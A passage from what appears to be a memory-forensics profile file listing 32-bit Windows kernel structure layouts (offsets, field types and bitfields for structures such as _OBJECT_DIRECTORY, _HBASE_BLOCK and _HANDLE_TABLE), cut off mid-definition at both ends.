'TypeList' : [ 0x0, ['_LIST_ENTRY']],
'CreatorUniqueProcess' : [ 0x8, ['pointer', ['void']]],
'CreatorBackTraceIndex' : [ 0xc, ['unsigned short']],
'Reserved' : [ 0xe, ['unsigned short']],
} ],
'_OBP_LOOKUP_CONTEXT' : [ 0x14, {
'Directory' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY']]],
'Object' : [ 0x4, ['pointer', ['void']]],
'HashValue' : [ 0x8, ['unsigned long']],
'HashIndex' : [ 0xc, ['unsigned short']],
'DirectoryLocked' : [ 0xe, ['unsigned char']],
'LockedExclusive' : [ 0xf, ['unsigned char']],
'LockStateSignature' : [ 0x10, ['unsigned long']],
} ],
'_OBJECT_DIRECTORY' : [ 0xa8, {
'HashBuckets' : [ 0x0, ['array', 37, ['pointer', ['_OBJECT_DIRECTORY_ENTRY']]]],
'Lock' : [ 0x94, ['_EX_PUSH_LOCK']],
'DeviceMap' : [ 0x98, ['pointer', ['_DEVICE_MAP']]],
'SessionId' : [ 0x9c, ['unsigned long']],
'NamespaceEntry' : [ 0xa0, ['pointer', ['void']]],
'Flags' : [ 0xa4, ['unsigned long']],
} ],
'_PS_CLIENT_SECURITY_CONTEXT' : [ 0x4, {
'ImpersonationData' : [ 0x0, ['unsigned long']],
'ImpersonationToken' : [ 0x0, ['pointer', ['void']]],
'ImpersonationLevel' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned long')]],
'EffectiveOnly' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
} ],
'_DBGKD_ANY_CONTROL_SET' : [ 0x1c, {
'X86ControlSet' : [ 0x0, ['_X86_DBGKD_CONTROL_SET']],
'AlphaControlSet' : [ 0x0, ['unsigned long']],
'IA64ControlSet' : [ 0x0, ['_IA64_DBGKD_CONTROL_SET']],
'Amd64ControlSet' : [ 0x0, ['_AMD64_DBGKD_CONTROL_SET']],
'ArmControlSet' : [ 0x0, ['_ARM_DBGKD_CONTROL_SET']],
'PpcControlSet' : [ 0x0, ['_PPC_DBGKD_CONTROL_SET']],
} ],
'_MMVAD_FLAGS3' : [ 0x4, {
'PreferredNode' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 6, native_type='unsigned long')]],
'Teb' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'SequentialAccess' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'LastSequentialTrim' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 24, native_type='unsigned long')]],
'Spare2' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'_MI_VERIFIER_POOL_HEADER' : [ 0x4, {
'VerifierPoolEntry' : [ 0x0, ['pointer', ['_VI_POOL_ENTRY']]],
} ],
'_HBASE_BLOCK' : [ 0x1000, {
'Signature' : [ 0x0, ['unsigned long']],
'Sequence1' : [ 0x4, ['unsigned long']],
'Sequence2' : [ 0x8, ['unsigned long']],
'TimeStamp' : [ 0xc, ['_LARGE_INTEGER']],
'Major' : [ 0x14, ['unsigned long']],
'Minor' : [ 0x18, ['unsigned long']],
'Type' : [ 0x1c, ['unsigned long']],
'Format' : [ 0x20, ['unsigned long']],
'RootCell' : [ 0x24, ['unsigned long']],
'Length' : [ 0x28, ['unsigned long']],
'Cluster' : [ 0x2c, ['unsigned long']],
'FileName' : [ 0x30, ['array', 64, ['unsigned char']]],
'RmId' : [ 0x70, ['_GUID']],
'LogId' : [ 0x80, ['_GUID']],
'Flags' : [ 0x90, ['unsigned long']],
'TmId' : [ 0x94, ['_GUID']],
'GuidSignature' : [ 0xa4, ['unsigned long']],
'Reserved1' : [ 0xa8, ['array', 85, ['unsigned long']]],
'CheckSum' : [ 0x1fc, ['unsigned long']],
'Reserved2' : [ 0x200, ['array', 882, ['unsigned long']]],
'ThawTmId' : [ 0xfc8, ['_GUID']],
'ThawRmId' : [ 0xfd8, ['_GUID']],
'ThawLogId' : [ 0xfe8, ['_GUID']],
'BootType' : [ 0xff8, ['unsigned long']],
'BootRecover' : [ 0xffc, ['unsigned long']],
} ],
'_ERESOURCE' : [ 0x38, {
'SystemResourcesList' : [ 0x0, ['_LIST_ENTRY']],
'OwnerTable' : [ 0x8, ['pointer', ['_OWNER_ENTRY']]],
'ActiveCount' : [ 0xc, ['short']],
'Flag' : [ 0xe, ['unsigned short']],
'SharedWaiters' : [ 0x10, ['pointer', ['_KSEMAPHORE']]],
'ExclusiveWaiters' : [ 0x14, ['pointer', ['_KEVENT']]],
'OwnerEntry' : [ 0x18, ['_OWNER_ENTRY']],
'ActiveEntries' : [ 0x20, ['unsigned long']],
'ContentionCount' : [ 0x24, ['unsigned long']],
'NumberOfSharedWaiters' : [ 0x28, ['unsigned long']],
'NumberOfExclusiveWaiters' : [ 0x2c, ['unsigned long']],
'Address' : [ 0x30, ['pointer', ['void']]],
'CreatorBackTraceIndex' : [ 0x30, ['unsigned long']],
'SpinLock' : [ 0x34, ['unsigned long']],
} ],
'_ARM_DBGKD_CONTROL_SET' : [ 0xc, {
'Continue' : [ 0x0, ['unsigned long']],
'CurrentSymbolStart' : [ 0x4, ['unsigned long']],
'CurrentSymbolEnd' : [ 0x8, ['unsigned long']],
} ],
'_LPCP_MESSAGE' : [ 0x30, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'FreeEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Reserved0' : [ 0x4, ['unsigned long']],
'SenderPort' : [ 0x8, ['pointer', ['void']]],
'RepliedToThread' : [ 0xc, ['pointer', ['_ETHREAD']]],
'PortContext' : [ 0x10, ['pointer', ['void']]],
'Request' : [ 0x18, ['_PORT_MESSAGE']],
} ],
'_HARDWARE_PTE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Write' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Owner' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WriteThrough' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CacheDisable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Accessed' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Dirty' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'LargePage' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'Global' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'reserved' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFrameNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_DUAL' : [ 0x13c, {
'Length' : [ 0x0, ['unsigned long']],
'Map' : [ 0x4, ['pointer', ['_HMAP_DIRECTORY']]],
'SmallDir' : [ 0x8, ['pointer', ['_HMAP_TABLE']]],
'Guard' : [ 0xc, ['unsigned long']],
'FreeDisplay' : [ 0x10, ['array', 24, ['_FREE_DISPLAY']]],
'FreeSummary' : [ 0x130, ['unsigned long']],
'FreeBins' : [ 0x134, ['_LIST_ENTRY']],
} ],
'_ALPC_PORT_ATTRIBUTES' : [ 0x2c, {
'Flags' : [ 0x0, ['unsigned long']],
'SecurityQos' : [ 0x4, ['_SECURITY_QUALITY_OF_SERVICE']],
'MaxMessageLength' : [ 0x10, ['unsigned long']],
'MemoryBandwidth' : [ 0x14, ['unsigned long']],
'MaxPoolUsage' : [ 0x18, ['unsigned long']],
'MaxSectionSize' : [ 0x1c, ['unsigned long']],
'MaxViewSize' : [ 0x20, ['unsigned long']],
'MaxTotalSectionSize' : [ 0x24, ['unsigned long']],
'DupObjectTypes' : [ 0x28, ['unsigned long']],
} ],
'_CM_INDEX_HINT_BLOCK' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'HashKey' : [ 0x4, ['array', 1, ['unsigned long']]],
} ],
'_KQUEUE' : [ 0x28, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'EntryListHead' : [ 0x10, ['_LIST_ENTRY']],
'CurrentCount' : [ 0x18, ['unsigned long']],
'MaximumCount' : [ 0x1c, ['unsigned long']],
'ThreadListHead' : [ 0x20, ['_LIST_ENTRY']],
} ],
'_KSTACK_COUNT' : [ 0x4, {
'Value' : [ 0x0, ['long']],
'State' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'StackCount' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
} ],
'_DISPATCHER_HEADER' : [ 0x10, {
'Type' : [ 0x0, ['unsigned char']],
'TimerControlFlags' : [ 0x1, ['unsigned char']],
'Absolute' : [ 0x1, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Coalescable' : [ 0x1, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'KeepShifting' : [ 0x1, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'EncodedTolerableDelay' : [ 0x1, ['BitField', dict(start_bit = 3, end_bit = 8, native_type='unsigned char')]],
'Abandoned' : [ 0x1, ['unsigned char']],
'Signalling' : [ 0x1, ['unsigned char']],
'ThreadControlFlags' : [ 0x2, ['unsigned char']],
'CpuThrottled' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'CycleProfiling' : [ 0x2, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'CounterProfiling' : [ 0x2, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Reserved' : [ 0x2, ['BitField', dict(start_bit = 3, end_bit = 8, native_type='unsigned char')]],
'Hand' : [ 0x2, ['unsigned char']],
'Size' : [ 0x2, ['unsigned char']],
'TimerMiscFlags' : [ 0x3, ['unsigned char']],
'Index' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Processor' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 6, native_type='unsigned char')]],
'Inserted' : [ 0x3, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'Expired' : [ 0x3, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'DebugActive' : [ 0x3, ['unsigned char']],
'ActiveDR7' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Instrumented' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'Reserved2' : [ 0x3, ['BitField', dict(start_bit = 2, end_bit = 6, native_type='unsigned char')]],
'UmsScheduled' : [ 0x3, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'UmsPrimary' : [ 0x3, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'DpcActive' : [ 0x3, ['unsigned char']],
'Lock' : [ 0x0, ['long']],
'SignalState' : [ 0x4, ['long']],
'WaitListHead' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_VI_POOL_ENTRY' : [ 0x10, {
'PageHeader' : [ 0x0, ['_VI_POOL_PAGE_HEADER']],
'InUse' : [ 0x0, ['_VI_POOL_ENTRY_INUSE']],
'NextFree' : [ 0x0, ['pointer', ['_SINGLE_LIST_ENTRY']]],
} ],
'_MM_PAGE_ACCESS_INFO' : [ 0x8, {
'Flags' : [ 0x0, ['_MM_PAGE_ACCESS_INFO_FLAGS']],
'FileOffset' : [ 0x0, ['unsigned long long']],
'VirtualAddress' : [ 0x0, ['pointer', ['void']]],
'DontUse0' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'Spare0' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'PointerProtoPte' : [ 0x4, ['pointer', ['void']]],
} ],
'_HEAP_COUNTERS' : [ 0x54, {
'TotalMemoryReserved' : [ 0x0, ['unsigned long']],
'TotalMemoryCommitted' : [ 0x4, ['unsigned long']],
'TotalMemoryLargeUCR' : [ 0x8, ['unsigned long']],
'TotalSizeInVirtualBlocks' : [ 0xc, ['unsigned long']],
'TotalSegments' : [ 0x10, ['unsigned long']],
'TotalUCRs' : [ 0x14, ['unsigned long']],
'CommittOps' : [ 0x18, ['unsigned long']],
'DeCommitOps' : [ 0x1c, ['unsigned long']],
'LockAcquires' : [ 0x20, ['unsigned long']],
'LockCollisions' : [ 0x24, ['unsigned long']],
'CommitRate' : [ 0x28, ['unsigned long']],
'DecommittRate' : [ 0x2c, ['unsigned long']],
'CommitFailures' : [ 0x30, ['unsigned long']],
'InBlockCommitFailures' : [ 0x34, ['unsigned long']],
'CompactHeapCalls' : [ 0x38, ['unsigned long']],
'CompactedUCRs' : [ 0x3c, ['unsigned long']],
'AllocAndFreeOps' : [ 0x40, ['unsigned long']],
'InBlockDeccommits' : [ 0x44, ['unsigned long']],
'InBlockDeccomitSize' : [ 0x48, ['unsigned long']],
'HighWatermarkSize' : [ 0x4c, ['unsigned long']],
'LastPolledSize' : [ 0x50, ['unsigned long']],
} ],
'_CM_KEY_HASH' : [ 0x10, {
'ConvKey' : [ 0x0, ['unsigned long']],
'NextHash' : [ 0x4, ['pointer', ['_CM_KEY_HASH']]],
'KeyHive' : [ 0x8, ['pointer', ['_HHIVE']]],
'KeyCell' : [ 0xc, ['unsigned long']],
} ],
'_SYSPTES_HEADER' : [ 0x14, {
'ListHead' : [ 0x0, ['_LIST_ENTRY']],
'Count' : [ 0x8, ['unsigned long']],
'NumberOfEntries' : [ 0xc, ['unsigned long']],
'NumberOfEntriesPeak' : [ 0x10, ['unsigned long']],
} ],
'_EXCEPTION_RECORD' : [ 0x50, {
'ExceptionCode' : [ 0x0, ['long']],
'ExceptionFlags' : [ 0x4, ['unsigned long']],
'ExceptionRecord' : [ 0x8, ['pointer', ['_EXCEPTION_RECORD']]],
'ExceptionAddress' : [ 0xc, ['pointer', ['void']]],
'NumberParameters' : [ 0x10, ['unsigned long']],
'ExceptionInformation' : [ 0x14, ['array', 15, ['unsigned long']]],
} ],
'_PENDING_RELATIONS_LIST_ENTRY' : [ 0x3c, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'WorkItem' : [ 0x8, ['_WORK_QUEUE_ITEM']],
'DeviceEvent' : [ 0x18, ['pointer', ['_PNP_DEVICE_EVENT_ENTRY']]],
'DeviceObject' : [ 0x1c, ['pointer', ['_DEVICE_OBJECT']]],
'RelationsList' : [ 0x20, ['pointer', ['_RELATION_LIST']]],
'EjectIrp' : [ 0x24, ['pointer', ['_IRP']]],
'Lock' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'IRPLOCK_CANCELABLE', 1: 'IRPLOCK_CANCEL_STARTED', 2: 'IRPLOCK_CANCEL_COMPLETE', 3: 'IRPLOCK_COMPLETED'})]],
'Problem' : [ 0x2c, ['unsigned long']],
'ProfileChangingEject' : [ 0x30, ['unsigned char']],
'DisplaySafeRemovalDialog' : [ 0x31, ['unsigned char']],
'LightestSleepState' : [ 0x34, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DockInterface' : [ 0x38, ['pointer', ['DOCK_INTERFACE']]],
} ],
'_I386_LOADER_BLOCK' : [ 0xc, {
'CommonDataArea' : [ 0x0, ['pointer', ['void']]],
'MachineType' : [ 0x4, ['unsigned long']],
'VirtualBias' : [ 0x8, ['unsigned long']],
} ],
'_CELL_DATA' : [ 0x50, {
'u' : [ 0x0, ['_u']],
} ],
'_ARC_DISK_INFORMATION' : [ 0x8, {
'DiskSignatures' : [ 0x0, ['_LIST_ENTRY']],
} ],
'_INITIAL_PRIVILEGE_SET' : [ 0x2c, {
'PrivilegeCount' : [ 0x0, ['unsigned long']],
'Control' : [ 0x4, ['unsigned long']],
'Privilege' : [ 0x8, ['array', 3, ['_LUID_AND_ATTRIBUTES']]],
} ],
'_HEAP_TUNING_PARAMETERS' : [ 0x8, {
'CommittThresholdShift' : [ 0x0, ['unsigned long']],
'MaxPreCommittThreshold' : [ 0x4, ['unsigned long']],
} ],
'_MMWSLE_NONDIRECT_HASH' : [ 0x8, {
'Key' : [ 0x0, ['pointer', ['void']]],
'Index' : [ 0x4, ['unsigned long']],
} ],
'_HMAP_DIRECTORY' : [ 0x1000, {
'Directory' : [ 0x0, ['array', 1024, ['pointer', ['_HMAP_TABLE']]]],
} ],
'_HANDLE_TABLE' : [ 0x3c, {
'TableCode' : [ 0x0, ['unsigned long']],
'QuotaProcess' : [ 0x4, ['pointer', ['_EPROCESS']]],
'UniqueProcessId' : [ 0x8, ['pointer', ['void']]],
'HandleLock' : [ 0xc, ['_EX_PUSH_LOCK']],
'HandleTableList' : [ 0x10, ['_LIST_ENTRY']],
'HandleContentionEvent' : [ 0x18, ['_EX_PUSH_LOCK']],
'DebugInfo' : [ 0x1c, ['pointer', ['_HANDLE_TRACE_DEBUG_INFO']]],
'ExtraInfoPages' : [ 0x20, ['long']],
'Flags' : [ 0x24, ['unsigned long']],
'StrictFIFO' : [ 0x24, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'FirstFreeHandle' : [ 0x28, ['unsigned long']],
'LastFreeHandleEntry' : [ 0x2c, ['pointer', ['_HANDLE_TABLE_ENTRY']]],
'HandleCount' : [ 0x30, ['unsigned long']],
'NextHandleNeedingPool' : [ 0x34, ['unsigned long']],
'HandleCountHighWatermark' : [ 0x38, ['unsigned long']],
} ],
'_POOL_TRACKER_BIG_PAGES' : [ 0x10, {
'Va' : [ 0x0, ['pointer', ['void']]],
'Key' : [ 0x4, ['unsigned long']],
'PoolType' : [ 0x8, ['unsigned long']],
'NumberOfBytes' : [ 0xc, ['unsigned long']],
} ],
'_MMVAD_FLAGS2' : [ 0x4, {
'FileOffset' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 24, native_type='unsigned long')]],
'SecNoChange' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long')]],
'OneSecured' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'MultipleSecured' : [ 0x0, ['BitField', dict(start_bit = 26, end_bit = 27, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 27, end_bit = 28, native_type='unsigned long')]],
'LongVad' : [ 0x0, ['BitField', dict(start_bit = 28, end_bit = 29, native_type='unsigned long')]],
'ExtendableFile' : [ 0x0, ['BitField', dict(start_bit = 29, end_bit = 30, native_type='unsigned long')]],
'Inherit' : [ 0x0, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
} ],
'_TEB_ACTIVE_FRAME' : [ 0xc, {
'Flags' : [ 0x0, ['unsigned long']],
'Previous' : [ 0x4, ['pointer', ['_TEB_ACTIVE_FRAME']]],
'Context' : [ 0x8, ['pointer', ['_TEB_ACTIVE_FRAME_CONTEXT']]],
} ],
'_FILE_GET_QUOTA_INFORMATION' : [ 0x14, {
'NextEntryOffset' : [ 0x0, ['unsigned long']],
'SidLength' : [ 0x4, ['unsigned long']],
'Sid' : [ 0x8, ['_SID']],
} ],
'_ACCESS_REASONS' : [ 0x80, {
'Data' : [ 0x0, ['array', 32, ['unsigned long']]],
} ],
'_CM_KEY_BODY' : [ 0x2c, {
'Type' : [ 0x0, ['unsigned long']],
'KeyControlBlock' : [ 0x4, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'NotifyBlock' : [ 0x8, ['pointer', ['_CM_NOTIFY_BLOCK']]],
'ProcessID' : [ 0xc, ['pointer', ['void']]],
'KeyBodyList' : [ 0x10, ['_LIST_ENTRY']],
'Flags' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'HandleTags' : [ 0x18, ['BitField', dict(start_bit = 16, end_bit = 32, native_type='unsigned long')]],
'KtmTrans' : [ 0x1c, ['pointer', ['void']]],
'KtmUow' : [ 0x20, ['pointer', ['_GUID']]],
'ContextListHead' : [ 0x24, ['_LIST_ENTRY']],
} ],
'_KWAIT_BLOCK' : [ 0x18, {
'WaitListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Thread' : [ 0x8, ['pointer', ['_KTHREAD']]],
'Object' : [ 0xc, ['pointer', ['void']]],
'NextWaitBlock' : [ 0x10, ['pointer', ['_KWAIT_BLOCK']]],
'WaitKey' : [ 0x14, ['unsigned short']],
'WaitType' : [ 0x16, ['unsigned char']],
'BlockState' : [ 0x17, ['unsigned char']],
} ],
'_MMPTE_PROTOTYPE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ProtoAddressLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 9, native_type='unsigned long')]],
'ReadOnly' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'ProtoAddressHigh' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 32, native_type='unsigned long')]],
} ],
'_WHEA_ERROR_PACKET_FLAGS' : [ 0x4, {
'PreviousError' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Reserved1' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'HypervisorError' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Simulated' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'PlatformPfaControl' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'PlatformDirectedOffline' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Reserved2' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_THERMAL_INFORMATION_EX' : [ 0x58, {
'ThermalStamp' : [ 0x0, ['unsigned long']],
'ThermalConstant1' : [ 0x4, ['unsigned long']],
'ThermalConstant2' : [ 0x8, ['unsigned long']],
'Processors' : [ 0xc, ['_KAFFINITY_EX']],
'SamplingPeriod' : [ 0x18, ['unsigned long']],
'CurrentTemperature' : [ 0x1c, ['unsigned long']],
'PassiveTripPoint' : [ 0x20, ['unsigned long']],
'CriticalTripPoint' : [ 0x24, ['unsigned long']],
'ActiveTripPointCount' : [ 0x28, ['unsigned char']],
'ActiveTripPoint' : [ 0x2c, ['array', 10, ['unsigned long']]],
'S4TransitionTripPoint' : [ 0x54, ['unsigned long']],
} ],
'__unnamed_1c1b' : [ 0x4, {
'FilePointerIndex' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned long')]],
'HardFault' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Image' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Spare0' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
} ],
'__unnamed_1c1d' : [ 0x4, {
'FilePointerIndex' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 9, native_type='unsigned long')]],
'HardFault' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'Spare1' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 12, native_type='unsigned long')]],
} ],
'_MM_PAGE_ACCESS_INFO_FLAGS' : [ 0x4, {
'File' : [ 0x0, ['__unnamed_1c1b']],
'Private' : [ 0x0, ['__unnamed_1c1d']],
} ],
'_VI_VERIFIER_ISSUE' : [ 0x10, {
'IssueType' : [ 0x0, ['unsigned long']],
'Address' : [ 0x4, ['pointer', ['void']]],
'Parameters' : [ 0x8, ['array', 2, ['unsigned long']]],
} ],
'_MMSUBSECTION_FLAGS' : [ 0x4, {
'SubsectionAccessed' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 6, native_type='unsigned short')]],
'StartingSector4132' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 16, native_type='unsigned short')]],
'SubsectionStatic' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'GlobalMemory' : [ 0x2, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'DirtyPages' : [ 0x2, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'Spare' : [ 0x2, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'SectorEndOffset' : [ 0x2, ['BitField', dict(start_bit = 4, end_bit = 16, native_type='unsigned short')]],
} ],
'_EXCEPTION_POINTERS' : [ 0x8, {
'ExceptionRecord' : [ 0x0, ['pointer', ['_EXCEPTION_RECORD']]],
'ContextRecord' : [ 0x4, ['pointer', ['_CONTEXT']]],
} ],
'_OBJECT_REF_INFO' : [ 0x1c, {
'ObjectHeader' : [ 0x0, ['pointer', ['_OBJECT_HEADER']]],
'NextRef' : [ 0x4, ['pointer', ['void']]],
'ImageFileName' : [ 0x8, ['array', 16, ['unsigned char']]],
'NextPos' : [ 0x18, ['unsigned short']],
'MaxStacks' : [ 0x1a, ['unsigned short']],
'StackInfo' : [ 0x1c, ['array', 0, ['_OBJECT_REF_STACK_INFO']]],
} ],
'_HBIN' : [ 0x20, {
'Signature' : [ 0x0, ['unsigned long']],
'FileOffset' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
'Reserved1' : [ 0xc, ['array', 2, ['unsigned long']]],
'TimeStamp' : [ 0x14, ['_LARGE_INTEGER']],
'Spare' : [ 0x1c, ['unsigned long']],
} ],
'_MI_IMAGE_SECURITY_REFERENCE' : [ 0xc, {
'SecurityContext' : [ 0x0, ['_IMAGE_SECURITY_CONTEXT']],
'DynamicRelocations' : [ 0x4, ['pointer', ['void']]],
'ReferenceCount' : [ 0x8, ['long']],
} ],
'_HEAP_TAG_ENTRY' : [ 0x40, {
'Allocs' : [ 0x0, ['unsigned long']],
'Frees' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
'TagIndex' : [ 0xc, ['unsigned short']],
'CreatorBackTraceIndex' : [ 0xe, ['unsigned short']],
'TagName' : [ 0x10, ['array', 24, ['wchar']]],
} ],
'_SECURITY_QUALITY_OF_SERVICE' : [ 0xc, {
'Length' : [ 0x0, ['unsigned long']],
'ImpersonationLevel' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'SecurityAnonymous', 1: 'SecurityIdentification', 2: 'SecurityImpersonation', 3: 'SecurityDelegation'})]],
'ContextTrackingMode' : [ 0x8, ['unsigned char']],
'EffectiveOnly' : [ 0x9, ['unsigned char']],
} ],
'__unnamed_1c3f' : [ 0x8, {
'List' : [ 0x0, ['_LIST_ENTRY']],
'Secured' : [ 0x0, ['_MMADDRESS_LIST']],
} ],
'__unnamed_1c45' : [ 0x4, {
'Banked' : [ 0x0, ['pointer', ['_MMBANKED_SECTION']]],
'ExtendedInfo' : [ 0x0, ['pointer', ['_MMEXTEND_INFO']]],
} ],
'_MMVAD_LONG' : [ 0x48, {
'u1' : [ 0x0, ['__unnamed_1580']],
'LeftChild' : [ 0x4, ['pointer', ['_MMVAD']]],
'RightChild' : [ 0x8, ['pointer', ['_MMVAD']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
'u' : [ 0x14, ['__unnamed_1583']],
'PushLock' : [ 0x18, ['_EX_PUSH_LOCK']],
'u5' : [ 0x1c, ['__unnamed_1586']],
'u2' : [ 0x20, ['__unnamed_1593']],
'Subsection' : [ 0x24, ['pointer', ['_SUBSECTION']]],
'FirstPrototypePte' : [ 0x28, ['pointer', ['_MMPTE']]],
'LastContiguousPte' : [ 0x2c, ['pointer', ['_MMPTE']]],
'ViewLinks' : [ 0x30, ['_LIST_ENTRY']],
'VadsProcess' : [ 0x38, ['pointer', ['_EPROCESS']]],
'u3' : [ 0x3c, ['__unnamed_1c3f']],
'u4' : [ 0x44, ['__unnamed_1c45']],
} ],
'_MMWSLE_FREE_ENTRY' : [ 0x4, {
'MustBeZero' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PreviousFree' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 12, native_type='unsigned long')]],
'NextFree' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_NT_TIB' : [ 0x1c, {
